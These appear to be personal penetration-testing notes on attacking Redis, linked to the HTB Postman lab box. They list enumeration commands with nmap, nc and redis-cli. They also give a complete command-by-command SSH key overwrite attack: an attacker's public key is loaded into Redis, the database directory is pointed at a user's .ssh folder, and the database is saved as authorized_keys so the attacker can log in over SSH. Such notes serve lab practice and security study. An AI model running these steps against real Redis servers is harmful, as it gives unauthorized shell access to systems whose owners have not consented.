Backlink: reference-notes-readme

See HTB Postman.

https://book.hacktricks.xyz/pentesting/6379-pentesting-redis

Default port: 6379

Automatic Enumeration:

nmap --script redis-info -sV -p 6379 <IP>

Manual Enumeration:

Connect with nc or redis-cli:

nc -vn 10.10.10.10 6379

redis-cli -h 10.10.10.10 # sudo apt-get install redis-tools

Dump information regarding Redis instance. If -NOAUTH returned auth required.

INFO

Authenticate using command AUTH. Valid creds responded with +OK.

AUTH <username> <password>

Dump configuration settings:

CONFIG GET *

SSH Key Overwrite:

https://book.hacktricks.xyz/pentesting/6379-pentesting-redis#ssh

Generate a ssh public-private key pair on your pc:

ssh-keygen -t rsa

Write the public key to a file:

(echo -e "\n\n"; cat ./.ssh/id_rsa.pub; echo -e "\n\n") > foo.txt

Import the file into redis:

cat foo.txt | redis-cli -h 10.85.0.52 -x set crackit

Save the public key to the authorized_keys file on the redis server:

redis-cli -h 10.85.0.52
config set dir /home/test/.ssh/
config set dbfilename "authorized_keys"
save

SSH in to the redis server with private key:

ssh -i id_rsa <user>@<host>